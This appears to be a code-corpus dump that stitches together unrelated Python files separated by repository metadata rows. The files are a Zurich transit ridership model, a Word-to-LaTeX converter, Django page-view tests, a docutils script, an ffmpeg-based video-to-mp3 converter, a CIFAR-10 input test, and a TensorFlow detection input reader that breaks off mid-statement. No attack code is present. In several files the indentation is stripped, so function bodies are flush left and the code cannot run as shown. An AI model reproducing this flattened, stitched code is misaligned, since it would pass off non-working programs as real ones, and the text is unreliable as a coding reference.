event_test(agent, 'docker/instance_inspect', post_func=post, diff=False)
| 32.196429 | 76 | 0.647255 |
4a1f686c01e29b744fed561a9edeccdae868a21a | 9,340 | py | Python | healthyways/vbz_training.py | frederiksemmel/VersusVirus-HealthyWays | 056b26430e3aca395f1e536b4dd74ddc5edc6567 | [
"MIT"
] | 1 | 2020-06-03T07:31:37.000Z | 2020-06-03T07:31:37.000Z | healthyways/vbz_training.py | frederiksemmel/VersusVirus-HealthyWays | 056b26430e3aca395f1e536b4dd74ddc5edc6567 | [
"MIT"
] | null | null | null | healthyways/vbz_training.py | frederiksemmel/VersusVirus-HealthyWays | 056b26430e3aca395f1e536b4dd74ddc5edc6567 | [
"MIT"
] | null | null | null | from datetime import datetime
import numpy as np
import pandas as pd
from sklearn.kernel_ridge import KernelRidge
from sklearn.linear_model import Ridge, LinearRegression
from sklearn.preprocessing import OneHotEncoder, PolynomialFeatures, normalize
from sklearn.model_selection import train_test_split
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import SGD
from tensorflow.keras.layers import Dense
from tensorflow.keras import regularizers
import seaborn as sns
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")
sns.set(style="ticks", color_codes=True)
def get_data_github():
filenames_suffix = [
"aa",
"ab",
"ac",
"ad",
"ae",
"af",
"ag",
"ah",
"ai",
"aj",
"ak",
"al",
"am",
]
reisende_raws = []
for suffix in filenames_suffix:
url = f"https://raw.githubusercontent.com/marinom27/VersusCorona/master/data/vbz_fahrgastzahlen/REISENDE_PART{suffix}.csv"
reisende_raws.append(pd.read_csv(url, sep=";", header=None, low_memory=False))
url = f"https://raw.githubusercontent.com/marinom27/VersusCorona/master/data/vbz_fahrgastzahlen/LINIE.csv"
linie = pd.read_csv(url, sep=";").set_index("Linien_Id")
url = f"https://raw.githubusercontent.com/marinom27/VersusCorona/master/data/vbz_fahrgastzahlen/TAGTYP.csv"
tagtyp = pd.read_csv(url, sep=";").set_index("Tagtyp_Id")
url = f"https://raw.githubusercontent.com/marinom27/VersusCorona/master/data/vbz_fahrgastzahlen/HALTESTELLEN.csv"
haltestellen = pd.read_csv(url, sep=";").set_index("Haltestellen_Id")
reisende_raw = pd.concat(reisende_raws)
new_columns = reisende_raw.iloc[0]
reisende_raw = reisende_raw.iloc[1:]
reisende_raw.columns = new_columns
return reisende_raw, linie, tagtyp, haltestellen
def get_data_local():
filenames_suffix = [
"aa",
"ab",
"ac",
"ad",
"ae",
"af",
"ag",
"ah",
"ai",
"aj",
"ak",
"al",
"am",
]
reisende_raws = []
for suffix in filenames_suffix:
url = f"../data/vbz_fahrgastzahlen/REISENDE_PART{suffix}.csv"
reisende_raws.append(pd.read_csv(url, sep=";", header=None, low_memory=False))
url = f"../data/vbz_fahrgastzahlen/LINIE.csv"
linie = pd.read_csv(url, sep=";").set_index("Linien_Id")
url = f"../data/vbz_fahrgastzahlen/TAGTYP.csv"
tagtyp = pd.read_csv(url, sep=";").set_index("Tagtyp_Id")
url = f"../data/vbz_fahrgastzahlen/HALTESTELLEN.csv"
haltestellen = pd.read_csv(url, sep=";").set_index("Haltestellen_Id")
reisende_raw = pd.concat(reisende_raws)
new_columns = reisende_raw.iloc[0]
reisende_raw = reisende_raw.iloc[1:]
reisende_raw.columns = new_columns
return reisende_raw, linie, tagtyp, haltestellen
def clean_reisende(reisende, linie, tagtyp, haltestellen):
reisende = reisende.rename(
columns={
"Tagtyp_Id": "Tagtyp_Id",
"Linienname": "Linie",
"Richtung": "Richtung",
"Sequenz": "Anzahl_Haltestellen",
"Haltestellen_Id": "Haltestelle_Id",
"Nach_Hst_Id": "Nachste_Haltestelle_Id",
"FZ_AB": "Uhrzeit",
"Anzahl_Messungen": "Anzahl_Messungen",
"Einsteiger": "Einsteiger",
"Aussteiger": "Aussteiger",
"Besetzung": "Besetzung",
"Distanz": "Distanz",
"Tage_DTV": "Tage_DTV",
"Tage_DWV": "Tage_DWV",
"Tage_SA": "Tage_SA",
"Tage_SO": "Tage_SO",
}
)
reisende = reisende[
[
"Tagtyp_Id",
"Linie",
"Richtung",
"Anzahl_Haltestellen",
"Haltestelle_Id",
"Nachste_Haltestelle_Id",
"Uhrzeit",
"Anzahl_Messungen",
"Einsteiger",
"Aussteiger",
"Besetzung",
"Distanz",
"Tage_DTV",
"Tage_DWV",
"Tage_SA",
"Tage_SO",
]
]
id_to_name = haltestellen["Haltestellenlangname"]
id_to_nummer = haltestellen["Haltestellennummer"]
id_to_tagbemerkung = tagtyp["Bemerkung"]
id_to_tage = {
"3": 62, # Sonntag
"4": 52, # Samstag
"5": 48, # Freitag
"6": 251, # Montag-Freitag
"7": 203, # Montag-Donnerstag
}
reisende["Tagtyp_Id"] = reisende["Tagtyp_Id"].astype("int32").astype("category")
reisende["Tagtyp_Bemerkung"] = (
reisende["Tagtyp_Id"].map(id_to_tagbemerkung).astype("category")
)
reisende["Tagtyp_Tage"] = reisende["Tagtyp_Id"].map(id_to_tage).astype("float32")
reisende["Linie"] = reisende["Linie"].astype("str").astype("category")
reisende["Richtung"] = reisende["Richtung"].astype("category")
reisende["Anzahl_Haltestellen"] = reisende["Anzahl_Haltestellen"].astype("int32")
reisende["Haltestelle_Id"].astype("int32")
reisende["Haltestelle"] = (
reisende["Haltestelle_Id"].map(id_to_name).astype("category")
)
reisende["Haltestelle_Nummer"] = (
reisende["Haltestelle_Id"].map(id_to_nummer).astype("category")
)
reisende["Nachste_Haltestelle"] = (
reisende["Nachste_Haltestelle_Id"].map(id_to_name).astype("category")
)
reisende["Nachste_Haltestelle_Nummer"] = (
reisende["Nachste_Haltestelle_Id"].map(id_to_nummer).astype("category")
)
reisende["Uhrzeit"] = pd.to_datetime(
reisende["Uhrzeit"], format="%H:%M:%S", errors="coerce"
)
reisende["Anzahl_Messungen"] = reisende["Anzahl_Messungen"].astype("int32")
reisende["Einsteiger"] = reisende["Einsteiger"].astype("float32")
reisende["Aussteiger"] = reisende["Aussteiger"].astype("float32")
reisende["Besetzung"] = reisende["Besetzung"].astype("float32")
reisende["Distanz"] = reisende["Distanz"].astype("float32")
reisende["Tage_DTV"] = reisende["Tage_DTV"].astype("float32").replace(0, np.NaN)
reisende["Tage_DWV"] = reisende["Tage_DWV"].astype("float32").replace(0, np.NaN)
reisende["Tage_SA"] = reisende["Tage_SA"].astype("float32").replace(0, np.NaN)
reisende["Tage_SO"] = reisende["Tage_SO"].astype("float32").replace(0, np.NaN)
reisende["Durchschnitt_Tag"] = reisende["Besetzung"] * reisende["Tage_DTV"] / 365
reisende["Durchschnitt_Wochentag"] = (
reisende["Besetzung"] * reisende["Tage_DWV"] / 251
)
reisende["Durchschnitt_Samstag"] = reisende["Besetzung"] * reisende["Tage_SA"] / 52
reisende["Durchschnitt_Sonntag"] = reisende["Besetzung"] * reisende["Tage_SO"] / 62
reisende["Tag"] = "Wochentag"
reisende["Tag"] = reisende["Tag"].where(
reisende["Durchschnitt_Samstag"].isna(), other="Samstag"
)
reisende["Tag"] = reisende["Tag"].where(
reisende["Durchschnitt_Sonntag"].isna(), other="Sonntag"
)
reisende["Tag"] = reisende["Tag"].astype("category")
reisende["Durchschnitt"] = reisende["Durchschnitt_Wochentag"]
reisende["Durchschnitt"] = reisende["Durchschnitt"].where(
reisende["Durchschnitt_Samstag"].isna(), other=reisende["Durchschnitt_Samstag"]
)
reisende["Durchschnitt"] = reisende["Durchschnitt"].where(
reisende["Durchschnitt_Sonntag"].isna(), other=reisende["Durchschnitt_Sonntag"]
)
return reisende
def clean_na(reisende_na):
reisende = reisende_na.dropna(
how="any",
subset=[
"Tagtyp_Id",
"Linie",
"Richtung",
"Haltestelle",
"Uhrzeit",
"Tag",
"Durchschnitt",
],
)
return reisende
def preprocess_df(X_df):
feature_names = ["Linie", "Richtung", "Haltestelle", "Uhrzeit_Bin", "Tag"]
X = X_df[feature_names]
X["Ort"] = (
X["Linie"].astype(str)
+ " "
+ X["Richtung"].astype(str)
+ " "
+ X["Haltestelle"].astype(str)
).astype("category")
categories = [X[name].cat.categories for name in X.columns]
    y = X_df["Besetzung"].to_numpy().reshape(-1, 1)
enc = OneHotEncoder(categories, handle_unknown="ignore").fit(X)
X = enc.transform(X).toarray()
return X, y
def fit_regression_model(reisende):
    X, y = preprocess_df(reisende)
model = Ridge(alpha=10, fit_intercept=False)
model.fit(X, y)
return model
def fit_neural_network(reisende):
X, y = preprocess_df(reisende)
n, d = X.shape
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.20, random_state=42
)
model = Sequential()
model.add(
Dense(
units=400,
activation="relu",
input_dim=d,
kernel_regularizer=regularizers.l2(0.01),
)
)
model.add(Dense(units=1))
sgd = SGD(learning_rate=0.005, momentum=0.0, nesterov=False)
model.compile(
loss="mean_squared_error", optimizer=sgd, metrics=["mean_squared_error"]
)
model.fit(X_train, y_train, epochs=10, batch_size=64)
loss_and_metrics = model.evaluate(X_test, y_test, batch_size=128)
print(model.summary())
print(loss_and_metrics)
model.reset_metrics()
model.save("vbz_model.h5")
return model
| 32.430556 | 130 | 0.625161 |
4a1f6a07eeabdd51bdc9e06142e7fcf9db17a135 | 3,861 | py | Python | wcit2bib/get_raw_tex.py | lucascr91/word2tex | a1dcba237aec276e5e024740f6c458715822b234 | [
"MIT"
] | null | null | null | wcit2bib/get_raw_tex.py | lucascr91/word2tex | a1dcba237aec276e5e024740f6c458715822b234 | [
"MIT"
] | null | null | null | wcit2bib/get_raw_tex.py | lucascr91/word2tex | a1dcba237aec276e5e024740f6c458715822b234 | [
"MIT"
] | null | null | null | print("Creating a TEX file from the word document")
import docx
import sys
import os
import pandas as pd
import numpy as np
from tqdm import tqdm
from docx.enum.text import WD_ALIGN_PARAGRAPH
try:
doc = docx.Document(sys.argv[1])
except:
raise ValueError("Please, add word document")
try:
new_path=sys.argv[2]
except:
raise ValueError("Please, add the target path")
def to_bold(text):
return '\\textbf{{{}}} '.format(text)
def to_italic(text):
return '\\textit{{{}}} '.format(text)
def to_underline(text):
return '\\underline{{{}}} '.format(text)
def run_df(para):
"""
Create a dataframe where each row is a run and the columns are boolean values informing if the run is bold, underline, italic etc.
"""
df= pd.DataFrame({"run":[k.text for k in para.runs],"bold":[k.bold for k in para.runs],"italic":[k.italic for k in para.runs], "underline":[k.underline for k in para.runs]})
df.replace({None:False}, inplace=True)
df['latex']=[to_bold(df['run'][k]) if (df['bold'][k]==True) & (df['italic'][k]==False) & (df['underline'][k]==False) else df['run'][k] for k in df.index]
df['latex']=[to_italic(df['run'][k]) if (df['bold'][k]==False) & (df['italic'][k]==True) & (df['underline'][k]==False) else df['latex'][k] for k in df.index]
df['latex']=[to_underline(df['run'][k]) if (df['bold'][k]==False) & (df['italic'][k]==False) & (df['underline'][k]==True) else df['latex'][k] for k in df.index]
df['latex']=[to_italic(to_bold(df['run'][k])) if (df['bold'][k]==True) & (df['italic'][k]==True) & (df['underline'][k]==False) else df['latex'][k] for k in df.index]
df['latex']=[to_underline(to_bold(df['run'][k])) if (df['bold'][k]==True) & (df['italic'][k]==False) & (df['underline'][k]==True) else df['latex'][k] for k in df.index]
df['latex']=[to_underline(to_italic(df['run'][k])) if (df['bold'][k]==False) & (df['italic'][k]==True) & (df['underline'][k]==True) else df['latex'][k] for k in df.index]
df['latex']=[to_bold(to_underline(to_italic(df['run'][k]))) if (df['bold'][k]==True) & (df['italic'][k]==True) & (df['underline'][k]==True) else df['latex'][k] for k in df.index]
return df
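# Illustrative helper (not part of the original script): shows how the wrappers
# above compose inside run_df's 'latex' column, using a made-up run text. A run
# that is only bold becomes \textbf{...}, while a bold+italic run is wrapped as
# \textit{\textbf{...} }.
def _latex_wrapping_example():
    """Return sample conversions for a hypothetical run text."""
    return {
        'bold': to_bold('word'),                    # -> '\textbf{word} '
        'bold+italic': to_italic(to_bold('word')),  # -> '\textit{\textbf{word} } '
    }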
os.chdir(new_path)
#get paragraphs
all_paragraphs = doc.paragraphs
#remove empty paragraphs
paragraphs = [k for k in all_paragraphs if k.text!='']
alignment_values=[paragraph.paragraph_format.alignment for paragraph in paragraphs]
print("These are the paragraphs alignments")
for value in alignment_values:
print(value)
# print("Center is regard as block citation")
#join paragraphs and add \par keyword
full_text = ''
for paragraph in tqdm(paragraphs):
#is center align?
if paragraph.paragraph_format.alignment==WD_ALIGN_PARAGRAPH.CENTER:
df=run_df(paragraph)
full_text = full_text + "\n" + "\\begin{{center}}\n{}\n\\end{{center}}".format(''.join(df['latex'].to_list()))+"\n"
# elif is_block[paragraph]:
# full_text = full_text + "\n" + "\\begin{{citacao}}\n{}\n\\end{{citacao}}".format(paragraph.text)+"\n"
else:
df=run_df(paragraph)
full_text = full_text + "\n" + "\par " + ''.join(df['latex'].to_list()) + "\n"
#create escapes for latex
full_text = full_text.replace("%","\%").replace("_","\_")
#add text to template
basic_template = "{}".format(full_text)
todoc_template = """
\\documentclass{{report}}
\\usepackage[utf8]{{inputenc}}
\\usepackage[portuguese]{{babel}}
\\usepackage[autostyle,portuguese=brazilian]{{csquotes}}
\\usepackage[
backend=biber,
style=alphabetic,
sorting=ynt
]{{biblatex}}
\\addbibresource{{references.bib}}
\\begin{{document}}
\\input{{title_page}}
{}
\\printbibliography
\\end{{document}}
""".format(full_text)
os.system("mkdir text")
f = open("text/text.tex", "w")
f.write(basic_template)
f.close()
f = open("docx/main.tex", "w")
f.write(todoc_template)
f.close()
print("Done") | 36.771429 | 182 | 0.650091 |
4a1f6a25595d5a8b4ee49ea8fb0404097e9a3fa4 | 4,152 | py | Python | testproject/fiber_test/tests/test_views/test_fibertemplateview.py | bsimons/django-fiber | 0f4b03217a4aeba6b48908825507fbe8c5732c8d | [
"Apache-2.0"
] | 143 | 2015-01-06T01:15:22.000Z | 2017-07-08T04:10:08.000Z | testproject/fiber_test/tests/test_views/test_fibertemplateview.py | bsimons/django-fiber | 0f4b03217a4aeba6b48908825507fbe8c5732c8d | [
"Apache-2.0"
] | 44 | 2015-01-22T14:21:32.000Z | 2017-05-31T16:59:23.000Z | testproject/fiber_test/tests/test_views/test_fibertemplateview.py | bsimons/django-fiber | 0f4b03217a4aeba6b48908825507fbe8c5732c8d | [
"Apache-2.0"
] | 53 | 2015-01-21T21:48:49.000Z | 2017-06-12T07:33:13.000Z | from django.contrib.auth.models import User
from django.test import TestCase, RequestFactory
from django.test.utils import override_settings
from fiber.models import Page, ContentItem, PageContentItem
from fiber.views import FiberTemplateView
class TestFiberTemplateView(TestCase):
def setUp(self):
self.frontpage = Page.objects.create(title='frontpage', url='/')
self.template_page = Page.objects.create(title='template page', url='/template-page/', template_name='template1.html')
def test_get_fiber_page_url(self):
"""Returns request url"""
view = FiberTemplateView()
view.request = RequestFactory().get(self.frontpage.url)
self.assertEqual(view.get_fiber_page_url(), self.frontpage.url)
def test_get_fiber_page(self):
"""Returns requested page"""
view = FiberTemplateView()
view.request = RequestFactory().get(self.frontpage.url)
self.assertEqual(view.get_fiber_page(), self.frontpage)
def test_get_fiber_page_for_non_fiber_url(self):
"""Returns requested page"""
view = FiberTemplateView()
view.request = RequestFactory().get('/empty/')
self.assertIsNone(view.get_fiber_page())
def test_get_template_names_default(self):
"""Returns default template"""
view = FiberTemplateView()
view.request = RequestFactory().get(self.frontpage.url)
self.assertEqual(view.get_template_names(), 'base.html')
def test_get_template_names_from_page(self):
"""Returns custom template"""
view = FiberTemplateView()
view.request = RequestFactory().get(self.template_page.url)
self.assertEqual(view.get_template_names(), 'template1.html')
def test_renders_default_template(self):
"""Renders default template to response"""
lipsum = ContentItem.objects.create(content_html='lorem ipsum')
PageContentItem.objects.create(page=self.frontpage, content_item=lipsum, block_name='main')
response = self.client.get(self.frontpage.url)
self.assertContains(response, 'lorem ipsum')
self.assertContains(response, '<title>frontpage</title>')
def test_renders_custom_template(self):
"""Renders custom template to tesponse"""
response = self.client.get(self.template_page.url)
self.assertContains(response, 'This is template1.')
def test_trailing_slash_redirect(self):
"""Handles APPEND_SLASH"""
self.assertRedirects(self.client.get(self.template_page.url.rstrip('/')), self.template_page.url, 301)
@override_settings(APPEND_SLASH=False)
def test_no_trailing_slash_redirect(self):
"""Considers APPEND_SLASH config"""
self.assertEqual(self.client.get(self.template_page.url.rstrip('/')).status_code, 404)
def test_redirect_page(self):
"""Redirects to another page"""
Page.objects.create(title='redirect', url='/redirect/', redirect_page=self.frontpage)
self.assertRedirects(self.client.get('/redirect/'), self.frontpage.url, 301)
def test_redirect_to_self(self):
"""Does not redirect to self"""
page = Page.objects.create(title='redirect loop', url='/redirect-loop/')
page.redirect_page = page
page.save()
self.assertEqual(self.client.get('/redirect-loop/').status_code, 200)
def test_404_page(self):
"""Does not mask 404 pages"""
self.assertEqual(self.client.get('/does-not-exists/').status_code, 404)
def test_private_pages(self):
"""Hides private pages"""
Page.objects.create(title='private', url='/private/', is_public=False)
self.assertEqual(self.client.get('/private/').status_code, 404)
def test_private_pages_for_staff(self):
"""Shows private pages"""
staff = User.objects.create_user('staff', '[email protected]', password='staff')
staff.is_staff = True
staff.save()
Page.objects.create(title='private', url='/private/', is_public=False)
self.client.login(username='staff', password='staff')
self.assertEqual(self.client.get('/private/').status_code, 200)
| 43.705263 | 126 | 0.688825 |
4a1f6abd8e981bf18a4247a3576c893419408672 | 297 | py | Python | samples/advanced/sources/route.py | bernardocouto/bottle-postgresql | e1b5a9d09565ebb21f59ae0d41ea2f67319ee53f | [
"MIT"
] | 10 | 2021-03-23T19:49:05.000Z | 2022-01-04T18:15:32.000Z | samples/advanced/sources/route.py | bernardocouto/bottle-postgresql | e1b5a9d09565ebb21f59ae0d41ea2f67319ee53f | [
"MIT"
] | null | null | null | samples/advanced/sources/route.py | bernardocouto/bottle-postgresql | e1b5a9d09565ebb21f59ae0d41ea2f67319ee53f | [
"MIT"
] | null | null | null | from bottle import Bottle
from samples.advanced.sources.log import get_logger
from samples.advanced.sources.resources.entity.resource import entity_resource
logger = get_logger(__name__)
route = Bottle()
resources = [
entity_resource
]
for resource in resources:
route.merge(resource)
| 19.8 | 78 | 0.794613 |
4a1f6c20ff0c65002ae690e35c8d998db183a4f9 | 1,660 | py | Python | notion_extensions/base/props/block/link_to_page.py | yuta0306/notion-extensions | 8a26f8c2abeef03a55c4d433439ce35ae5728a75 | [
"MIT"
] | 1 | 2022-01-12T15:53:43.000Z | 2022-01-12T15:53:43.000Z | notion_extensions/base/props/block/link_to_page.py | yuta0306/notion-extensions | 8a26f8c2abeef03a55c4d433439ce35ae5728a75 | [
"MIT"
] | 1 | 2022-03-24T01:38:42.000Z | 2022-03-24T01:38:42.000Z | notion_extensions/base/props/block/link_to_page.py | yuta0306/notion-extensions | 8a26f8c2abeef03a55c4d433439ce35ae5728a75 | [
"MIT"
] | null | null | null | import sys
from typing import Dict, Union
if sys.version_info >= (3, 8):  # typing.Literal is available from Python 3.8
from typing import Literal
else:
from typing_extensions import Literal
from .block import Block
from ...utils import parse_id
__all__ = [
"LinkToPage",
]
class LinkToPage(Block):
"""
LinkToPage
LinkToPage property values of block
Attributes
----------
type_ : str
Type of this link to page object. Possible values are: "page", "database"
id_ : str
Identifier for a page or a database page
Methods
-------
clear()
Clear data of title
json()
Return this class as dictionary
"""
TEMPLATE: Dict[str, Union[str, Dict]] = {
"type": "link_to_page",
"link_to_page": {},
}
def __init__(
self,
type_: Literal["page", "database"],
id_: str,
):
"""
Parameters
----------
type_ : 'page' or 'database'
Type of this link to page object. Possible values are: "page", "database"
id_ : str
Identifier for a page or a database page, URL style is ok.
"""
super().__init__()
if type_ not in ("page", "database"):
raise ValueError("type_ must be `page` or `database`")
id_ = parse_id(id_=id_, type_=type_)
type_ = f"{type_}_id"
self["link_to_page"]["type"] = type_
self["link_to_page"][type_] = id_
@property
def type_(self) -> str:
return self["link_to_page"]["type"]
@property
def id_(self) -> str:
return self["link_to_page"][self.type_]
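# Usage sketch (illustrative, not from the package docs): the identifier below is
# a made-up page id; any page URL or UUID accepted by parse_id should work.
#
#     link = LinkToPage(type_="page", id_="c03f6b0e23e54bc1a7850e9b2b3f9a11")
#     link.type_  # -> "page_id"
#     link.id_    # -> the identifier as normalized by parse_id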
| 23.714286 | 85 | 0.565663 |
4a1f6ca7dd16d24e2ac94203d7e79e70f907f754 | 2,256 | py | Python | src/VideoToAudioConverter.py | NagabhushanSN95/VideoToAudioConverter | 964459047b96a71db2078288c71e45a43eaefa27 | [
"Apache-2.0"
] | null | null | null | src/VideoToAudioConverter.py | NagabhushanSN95/VideoToAudioConverter | 964459047b96a71db2078288c71e45a43eaefa27 | [
"Apache-2.0"
] | null | null | null | src/VideoToAudioConverter.py | NagabhushanSN95/VideoToAudioConverter | 964459047b96a71db2078288c71e45a43eaefa27 | [
"Apache-2.0"
] | null | null | null | # Shree KRISHNAya Namaha
# Converts videos to mp3 files and saves them. Optionally adds metadata to the audio files.
# Author: Nagabhushan S N
# Last Modified: 06/03/22
import eyed3
import os
import time
import datetime
import traceback
from pathlib import Path
from tqdm import tqdm
this_filepath = Path(__file__)
this_filename = this_filepath.stem
def convert_songs(src_dirpath: Path, tgt_dirpath: Path, add_metadata: bool = False):
all_files = sorted(src_dirpath.rglob('**/*'))
all_files = [path for path in all_files if path.is_file()]
all_files = [path for path in all_files if path.suffix not in ['.txt', '.png', '.jpg']]
for src_path in tqdm(all_files):
tgt_path = tgt_dirpath / os.path.relpath(src_path, src_dirpath)
tgt_path = tgt_path.parent / f'{tgt_path.stem}.mp3'
tgt_path.parent.mkdir(parents=True, exist_ok=True)
cmd = f'ffmpeg -i "{src_path.as_posix()}" "{tgt_path.as_posix()}"'
os.system(cmd)
if add_metadata:
title = tgt_path.stem
artist = tgt_path.parent.parent.stem
album = tgt_path.parent.stem
mp3_file = eyed3.load(tgt_path.as_posix())
mp3_file.tag.title = title
            if artist.lower() != 'unknown':
mp3_file.tag.artist = artist
if album.lower() != 'unknown':
mp3_file.tag.album = album
# mp3_file.tag.year = year
# mp3_file.tag.comments.set(comments)
mp3_file.tag.save()
return
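# Illustrative note (paths are hypothetical): for a source file
# FilmSongsVideo/ArtistName/AlbumName/song.mp4, the loop above runs roughly
#   ffmpeg -i ".../ArtistName/AlbumName/song.mp4" ".../ArtistName/AlbumName/song.mp3"
# and then, when add_metadata is True, tags the mp3 with title "song",
# artist "ArtistName" and album "AlbumName" via eyed3.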
def main():
src_dirpath = Path('../Data/FilmSongsVideo')
tgt_dirpath = Path('../Data/FilmSongsAudio')
convert_songs(src_dirpath, tgt_dirpath, add_metadata=True)
return
if __name__ == '__main__':
print('Program started at ' + datetime.datetime.now().strftime('%d/%m/%Y %I:%M:%S %p'))
start_time = time.time()
try:
main()
run_result = 'Program completed successfully!'
except Exception as e:
print(e)
traceback.print_exc()
run_result = 'Error: ' + str(e)
end_time = time.time()
print('Program ended at ' + datetime.datetime.now().strftime('%d/%m/%Y %I:%M:%S %p'))
print('Execution time: ' + str(datetime.timedelta(seconds=end_time - start_time)))
| 33.671642 | 92 | 0.638741 |
4a1f6d8b313af7b94e9b2bf5801fd9c7f62535ac | 2,311 | py | Python | tensorflow/models/image/cifar10/cifar10_input_test.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | 680 | 2016-12-03T14:38:28.000Z | 2022-02-16T04:06:45.000Z | tensorflow/models/image/cifar10/cifar10_input_test.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | 38 | 2016-11-17T08:43:51.000Z | 2019-11-12T12:27:04.000Z | tensorflow/models/image/cifar10/cifar10_input_test.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | 250 | 2016-12-05T10:37:17.000Z | 2022-03-18T21:26:55.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for cifar10 input."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
from tensorflow.models.image.cifar10 import cifar10_input
class CIFAR10InputTest(tf.test.TestCase):
def _record(self, label, red, green, blue):
image_size = 32 * 32
record = bytes(bytearray([label] + [red] * image_size +
[green] * image_size + [blue] * image_size))
expected = [[[red, green, blue]] * 32] * 32
return record, expected
def testSimple(self):
labels = [9, 3, 0]
records = [self._record(labels[0], 0, 128, 255),
self._record(labels[1], 255, 0, 1),
self._record(labels[2], 254, 255, 0)]
contents = b"".join([record for record, _ in records])
expected = [expected for _, expected in records]
filename = os.path.join(self.get_temp_dir(), "cifar")
open(filename, "wb").write(contents)
with self.test_session() as sess:
q = tf.FIFOQueue(99, [tf.string], shapes=())
q.enqueue([filename]).run()
q.close().run()
result = cifar10_input.read_cifar10(q)
for i in range(3):
key, label, uint8image = sess.run([
result.key, result.label, result.uint8image])
self.assertEqual("%s:%d" % (filename, i), tf.compat.as_text(key))
self.assertEqual(labels[i], label)
self.assertAllEqual(expected[i], uint8image)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run([result.key, result.uint8image])
if __name__ == "__main__":
tf.test.main()
| 34.492537 | 80 | 0.648204 |
4a1f6db005ec53654d0dc60c6f5f5be185a5fa0e | 664 | py | Python | Data/lambda/bin/rst2xml.py | Diegod96/AWS-Reddit-Application | 39830514ed02c88119ce4f6ff70b4fbb084db3ef | [
"MIT"
] | null | null | null | Data/lambda/bin/rst2xml.py | Diegod96/AWS-Reddit-Application | 39830514ed02c88119ce4f6ff70b4fbb084db3ef | [
"MIT"
] | null | null | null | Data/lambda/bin/rst2xml.py | Diegod96/AWS-Reddit-Application | 39830514ed02c88119ce4f6ff70b4fbb084db3ef | [
"MIT"
] | null | null | null | #!C:\Users\diego\development\AWS-Reddit-Application\Data\venv\Scripts\python.exe
# $Id: rst2xml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing Docutils XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
'reStructuredText sources. ' + default_description)
publish_cmdline(writer_name='xml', description=description)
| 27.666667 | 80 | 0.746988 |
4a1f6e4e20a11ee6e4af4880705c42205b9607e3 | 5,733 | py | Python | tf_tpu_models/official/detection/dataloader/input_reader.py | hrsma2i/kaggle-imaterialist2020-model | 7822b52f743afb3367a4448a303ac1ee0f869e1d | [
"Apache-2.0"
] | 2 | 2021-07-06T04:41:53.000Z | 2022-03-11T00:22:18.000Z | tf_tpu_models/official/detection/dataloader/input_reader.py | hrsma2i/kaggle-imaterialist2020-model | 7822b52f743afb3367a4448a303ac1ee0f869e1d | [
"Apache-2.0"
] | 7 | 2021-09-01T05:29:35.000Z | 2022-01-17T10:49:59.000Z | tf_tpu_models/official/detection/dataloader/input_reader.py | hrsma2i/kaggle-imaterialist2020-model | 7822b52f743afb3367a4448a303ac1ee0f869e1d | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Data loader and input processing."""
import tensorflow as tf
from dataloader import factory
from dataloader import mode_keys as ModeKeys
from ops import spatial_transform_ops
def transform_image_for_tpu(
batch_images, space_to_depth_block_size=1, transpose_images=True
):
"""Transforms batched images to optimize memory usage on TPU.
Args:
batch_images: Batched images in the shape [batch_size, image_height,
image_width, num_channel].
    space_to_depth_block_size: An integer for space-to-depth block size. The
input image's height and width must be divisible by block_size. The block
size also needs to match the stride length of the first conv layer. See
go/auto-space-to-depth and tf.nn.space_to_depth.
    transpose_images: Whether or not to transpose image dimensions.
Returns:
transformed batched images.
"""
if space_to_depth_block_size > 1:
return spatial_transform_ops.fused_transpose_and_space_to_depth(
batch_images, space_to_depth_block_size, transpose_images
)
elif transpose_images:
# Transpose the input images from [N,H,W,C] to [H,W,C,N] since reshape on
# TPU is expensive.
return tf.transpose(a=batch_images, perm=[1, 2, 3, 0])
else:
return batch_images
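# Shape sketch (illustrative sizes): with transpose_images=True and
# space_to_depth_block_size=1, a batch of shape [8, 640, 640, 3] comes back as
# [640, 640, 3, 8]; with space_to_depth_block_size > 1 the fused helper above also
# folds each block_size x block_size spatial patch into the channel dimension
# (tf.nn.space_to_depth) in addition to the transpose.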
class InputFn(object):
"""Input function for tf.Estimator."""
def __init__(self, file_pattern, params, mode, dataset_type="tfrecord"):
self._file_pattern = file_pattern
self._mode = mode
self._is_training = mode == ModeKeys.TRAIN
if dataset_type == "tfrecord":
self._dataset_fn = tf.data.TFRecordDataset
self._parser_fn = factory.parser_generator(params, mode)
else:
raise ValueError("Dataset type %s is not supported." % dataset_type)
self._transpose_input = params.train.transpose_input
self._space_to_depth_block_size = params.train.space_to_depth_block_size
def __call__(self, params):
batch_size = params["batch_size"]
dataset = tf.data.Dataset.list_files(
self._file_pattern, shuffle=self._is_training
)
if self._is_training:
dataset = dataset.repeat()
dataset = dataset.apply(
tf.data.experimental.parallel_interleave(
